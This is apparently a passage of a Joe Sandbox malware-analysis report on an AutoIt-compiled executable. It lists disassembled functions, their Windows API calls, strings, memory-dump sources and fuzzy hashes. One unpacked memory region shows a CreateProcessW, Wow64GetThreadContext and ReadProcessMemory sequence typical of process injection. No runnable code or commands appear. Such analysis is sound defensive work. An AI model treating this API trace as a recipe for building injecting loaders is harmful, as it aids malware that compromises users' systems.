                                                    • Part of subcall function 00BC4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,(l,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BC4E0F
                                                  • _free.LIBCMT ref: 00BFE263
                                                  • _free.LIBCMT ref: 00BFE2AA
                                                    • Part of subcall function 00BC6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BC6BAD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                  • API String ID: 2861923089-1757145024
                                                  • Opcode ID: 994422adc057bf1138a08c8e5e743342c2abf5e6d1d3e08a8c7e95dc4ca95da0
                                                  • Instruction ID: c0c423e2c3653de136e398d642a6edf488c18a1b6419f62f8b46f73f927b427d
                                                  • Opcode Fuzzy Hash: 994422adc057bf1138a08c8e5e743342c2abf5e6d1d3e08a8c7e95dc4ca95da0
                                                  • Instruction Fuzzy Hash: D0914C71910219AFCF14EFA4CC919FDB7F4FF19310B1044AAF926AB2A1DB70AA55CB50
                                                  Function 00BCF76F Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BE0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BE0193
                                                    • Part of subcall function 00BE0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BE019B
                                                    • Part of subcall function 00BE0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BE01A6
                                                    • Part of subcall function 00BE0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BE01B1
                                                    • Part of subcall function 00BE0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BE01B9
                                                    • Part of subcall function 00BE0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BE01C1
                                                    • Part of subcall function 00BD60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00BCF930), ref: 00BD6154
                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BCF9CD
                                                  • OleInitialize.OLE32(00000000), ref: 00BCFA4A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C045C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                  • String ID: H
                                                  • API String ID: 1986988660-69643886
                                                  • Opcode ID: 5d3ed4fe73425dbe0aa6ea847a910837659beec96cfadbe35426387c1aa5ffd7
                                                  • Instruction ID: 067d2deeed9c063ec7b5f799eb71e0e9ac2727d3cce191742354c6a1d518c501
                                                  • Opcode Fuzzy Hash: 5d3ed4fe73425dbe0aa6ea847a910837659beec96cfadbe35426387c1aa5ffd7
                                                  • Instruction Fuzzy Hash: BB81A9B4915A40CFC784EF39A844B1DBBE5FB99306790816EA419CB372EBF044858F1D
                                                  Function 00BC35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00BC35A1,SwapMouseButtons,00000004,?), ref: 00BC35D4
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00BC35A1,SwapMouseButtons,00000004,?,?,?,?,00BC2754), ref: 00BC35F5
                                                  • RegCloseKey.KERNELBASE(00000000,?,?,00BC35A1,SwapMouseButtons,00000004,?,?,?,?,00BC2754), ref: 00BC3617
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Control Panel\Mouse
                                                  • API String ID: 3677997916-824357125
                                                  • Opcode ID: e54d285b9a568e58ed247ff88a5542c25f0cff9f0ceaf8503d541adc50ec0c30
                                                  • Instruction ID: 78e259413107d9fabd9c2cb0a2992bf1e539994754f19cce8ddc0a2bd9031dfe
                                                  • Opcode Fuzzy Hash: e54d285b9a568e58ed247ff88a5542c25f0cff9f0ceaf8503d541adc50ec0c30
                                                  • Instruction Fuzzy Hash: 60114575614208BFDB208F64DC80EAEBBF8EF45B41F4184A9E805D7210E2729E419BA0
                                                  Function 00F5B250 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00F5BA0B
                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F5BAA1
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F5BAC3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307795327.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_f59000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                  • String ID:
                                                  • API String ID: 2438371351-0
                                                  • Opcode ID: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
                                                  • Instruction ID: eabcfd1d551a90e6d210732f26c2540edcf5efc2c66376d5e6f134f1c4acef38
                                                  • Opcode Fuzzy Hash: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
                                                  • Instruction Fuzzy Hash: 6D621B30A14258DBEB24CFA4C841BDEB372EF58301F1091A9D60DEB390E7799E85DB59
                                                  Function 00BE470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                  • String ID:
                                                  • API String ID: 2782032738-0
                                                  • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                  • Instruction ID: 1f3342eda23e97fed1c951df09472f3ff84510a5c40684aa83bb3409c18a3cd6
                                                  • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                  • Instruction Fuzzy Hash: C1418575B007C59BDB188E6BD8809AE77E6EF46360F2485FDE815C7640E770DD418B90
                                                  Function 00BC44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00BC44CF
                                                    • Part of subcall function 00BC407C: _memset.LIBCMT ref: 00BC40FC
                                                    • Part of subcall function 00BC407C: _wcscpy.LIBCMT ref: 00BC4150
                                                    • Part of subcall function 00BC407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BC4160
                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00BC4524
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BC4533
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BFD4B9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                  • String ID:
                                                  • API String ID: 1378193009-0
                                                  • Opcode ID: b4fe19299f829cf6fd9f3933aea79ae442569d281013356b9db19abb3a2f8ae2
                                                  • Instruction ID: abdc4ddeb51acb135364c35b9f4895ff1db257a65d4096e9cbbb663a0a7d2ee7
                                                  • Opcode Fuzzy Hash: b4fe19299f829cf6fd9f3933aea79ae442569d281013356b9db19abb3a2f8ae2
                                                  • Instruction Fuzzy Hash: 1821C5749047989FE7328B248895FFABBECEF16314F0404DDE79A57241C7746A88CB51
                                                  Function 00BC7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00BFEA39
                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00BFEA83
                                                    • Part of subcall function 00BC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC4743,?,?,00BC37AE,?), ref: 00BC4770
                                                    • Part of subcall function 00BE0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BE07B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                  • String ID: X
                                                  • API String ID: 3777226403-3081909835
                                                  • Opcode ID: 87bad9f2917f9262478bd0642734869fc7d5275c233d19e3c85b2982c2ad6686
                                                  • Instruction ID: a8214368aa7dbbce66f0f995d246b770a7806adbd9c69b7b8e607a26543ae167
                                                  • Opcode Fuzzy Hash: 87bad9f2917f9262478bd0642734869fc7d5275c233d19e3c85b2982c2ad6686
                                                  • Instruction Fuzzy Hash: 36219371A102589BCF519F98C845BEE7BF8AF49714F00809AE508BB241DFF4998DCFA1
                                                  Function 00BC47D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsThemeActive.UXTHEME ref: 00BC4834
                                                    • Part of subcall function 00BE336C: __lock.LIBCMT ref: 00BE3372
                                                    • Part of subcall function 00BE336C: DecodePointer.KERNEL32(00000001,?,00BC4849,00C17C74), ref: 00BE337E
                                                    • Part of subcall function 00BE336C: EncodePointer.KERNEL32(?,?,00BC4849,00C17C74), ref: 00BE3389
                                                    • Part of subcall function 00BC48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00BC4915
                                                    • Part of subcall function 00BC48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BC492A
                                                    • Part of subcall function 00BC3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BC3B68
                                                    • Part of subcall function 00BC3B3A: IsDebuggerPresent.KERNEL32 ref: 00BC3B7A
                                                    • Part of subcall function 00BC3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,(l,00C852E0,?,?), ref: 00BC3BEB
                                                    • Part of subcall function 00BC3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00BC3C6F
                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BC4874
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                  • String ID:
                                                  • API String ID: 1438897964-3162483948
                                                  • Opcode ID: cafebd3c0e02b34410a3e1ae331f9b38e5f63f9e26bd7764dfdf313a13cd55d3
                                                  • Instruction ID: b733e578995adcbe0c39d09e5890a5e71344d957d90f0a330d94689a0b2803d6
                                                  • Opcode Fuzzy Hash: cafebd3c0e02b34410a3e1ae331f9b38e5f63f9e26bd7764dfdf313a13cd55d3
                                                  • Instruction Fuzzy Hash: F0118C719083419FD700DF29D849B0EBFE8EB95750F10455EF090972B1DBB09645CB96
                                                  Function 00C298E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00C298F8
                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C2990F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Temp$FileNamePath
                                                  • String ID: aut
                                                  • API String ID: 3285503233-3010740371
                                                  • Opcode ID: 530213cb4fb1bf5eef6e68240e9c79700a9ee24897ad5a8c24703d9a3a9d7bfd
                                                  • Instruction ID: 557300f4d3188edc083fbfe28f5f382b93d4913c73501f689c87171d935233c3
                                                  • Opcode Fuzzy Hash: 530213cb4fb1bf5eef6e68240e9c79700a9ee24897ad5a8c24703d9a3a9d7bfd
                                                  • Instruction Fuzzy Hash: F9D05E7958030DABDB609BA0DC0EF9A773CE704700F0042B1BB94910A1EAB095998B91
                                                  Function 00C3CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 799834a4d50fd3adcccac0374b61173d96cb4147c9952baa48bfbf9a07fdb954
                                                  • Instruction ID: ac4c43d237311919e6bcc0207e6e1ecb9cce2bf91c12bd1edc97f09eca3f3ba7
                                                  • Opcode Fuzzy Hash: 799834a4d50fd3adcccac0374b61173d96cb4147c9952baa48bfbf9a07fdb954
                                                  • Instruction Fuzzy Hash: DAF125716083019FCB14DF28C484A6EBBE5FF89314F14896EF8A99B251D770E945CF82
                                                  Function 00BC434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00BC4370
                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BC4415
                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BC4432
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_$_memset
                                                  • String ID:
                                                  • API String ID: 1505330794-0
                                                  • Opcode ID: 928a9779239fa167c44f9981e19be44af5399d31a6099b53b4c96507fe5823a1
                                                  • Instruction ID: 1525a87ad0fa51828f0cb5f97779bb2e6c1c5b15a0c95eaf49ced16f76d2aeb2
                                                  • Opcode Fuzzy Hash: 928a9779239fa167c44f9981e19be44af5399d31a6099b53b4c96507fe5823a1
                                                  • Instruction Fuzzy Hash: 4C3193705047118FD721DF24D894B9BBBF8FB89309F00097EF69AC2251DBB1AA44CB56
                                                  Function 00BE571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __FF_MSGBANNER.LIBCMT ref: 00BE5733
                                                    • Part of subcall function 00BEA16B: __NMSG_WRITE.LIBCMT ref: 00BEA192
                                                    • Part of subcall function 00BEA16B: __NMSG_WRITE.LIBCMT ref: 00BEA19C
                                                  • __NMSG_WRITE.LIBCMT ref: 00BE573A
                                                    • Part of subcall function 00BEA1C8: GetModuleFileNameW.KERNEL32(00000000,00C833BA,00000104,?,00000001,00000000), ref: 00BEA25A
                                                    • Part of subcall function 00BEA1C8: ___crtMessageBoxW.LIBCMT ref: 00BEA308
                                                    • Part of subcall function 00BE309F: ___crtCorExitProcess.LIBCMT ref: 00BE30A5
                                                    • Part of subcall function 00BE309F: ExitProcess.KERNEL32 ref: 00BE30AE
                                                    • Part of subcall function 00BE8B28: __getptd_noexit.LIBCMT ref: 00BE8B28
                                                  • RtlAllocateHeap.NTDLL(00ED0000,00000000,00000001,00000000,?,?,?,00BE0DD3,?), ref: 00BE575F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 1372826849-0
                                                  • Opcode ID: 3106f70ea36f3b277302e58ef458e15ee94f9b64ee7e3e4a7997330f443226d2
                                                  • Instruction ID: 91c4ba00c00a0337e4e12cbc7c1774b03c825fcb161e746ff6e7ae301e9580d7
                                                  • Opcode Fuzzy Hash: 3106f70ea36f3b277302e58ef458e15ee94f9b64ee7e3e4a7997330f443226d2
                                                  • Instruction Fuzzy Hash: CD012435200BD1DAD621277BEC92B2E77C8DF82B6AF1104A9F419AB1C2DF709C014765
                                                  Function 00C298A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C29548,?,?,?,?,?,00000004), ref: 00C298BB
                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C29548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C298D1
                                                  • CloseHandle.KERNEL32(00000000,?,00C29548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C298D8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleTime
                                                  • String ID:
                                                  • API String ID: 3397143404-0
                                                  • Opcode ID: 9af37be15b87c8c5ac52f9905f7a6cadba0f4d8c711f8b7d0c819a53c3c07bfb
                                                  • Instruction ID: d42107a459a922244ef31bedbe10ebee45c163f3e30d4fd3188473f90da6e55c
                                                  • Opcode Fuzzy Hash: 9af37be15b87c8c5ac52f9905f7a6cadba0f4d8c711f8b7d0c819a53c3c07bfb
                                                  • Instruction Fuzzy Hash: 3CE08636140224B7EB211F64EC09FDE7B59FB07B70F144124FB24690F087B1261297A8
                                                  Function 00C28D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00C28D1B
                                                    • Part of subcall function 00BE2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00BE9A24), ref: 00BE2D69
                                                    • Part of subcall function 00BE2D55: GetLastError.KERNEL32(00000000,?,00BE9A24), ref: 00BE2D7B
                                                  • _free.LIBCMT ref: 00C28D2C
                                                  • _free.LIBCMT ref: 00C28D3E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                  • Instruction ID: 9ecea1976160d3d5d8b434c5a56867810c4c0f7a6e4e431029c27a973b3ac6dc
                                                  • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                  • Instruction Fuzzy Hash: 64E0C2A160265282CB20A779BC40B8313DC4F48352B04486DB61DD7186CF60F84A8024
                                                  Function 00BCA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CALL
                                                  • API String ID: 0-4196123274
                                                  • Opcode ID: e5143531ebb9ff1bdf0aa9fb8f3e35643d2b687b96723214fdb1374c14443de1
                                                  • Instruction ID: ff8a0b53bbd5365b2d658ce85c731b6c71b3a72b583c3ca56e652daacef5e965
                                                  • Opcode Fuzzy Hash: e5143531ebb9ff1bdf0aa9fb8f3e35643d2b687b96723214fdb1374c14443de1
                                                  • Instruction Fuzzy Hash: 33224570608205DFC724DF14C495F6ABBE1FF84304F1589ADE89A9B262D731EC85DB82
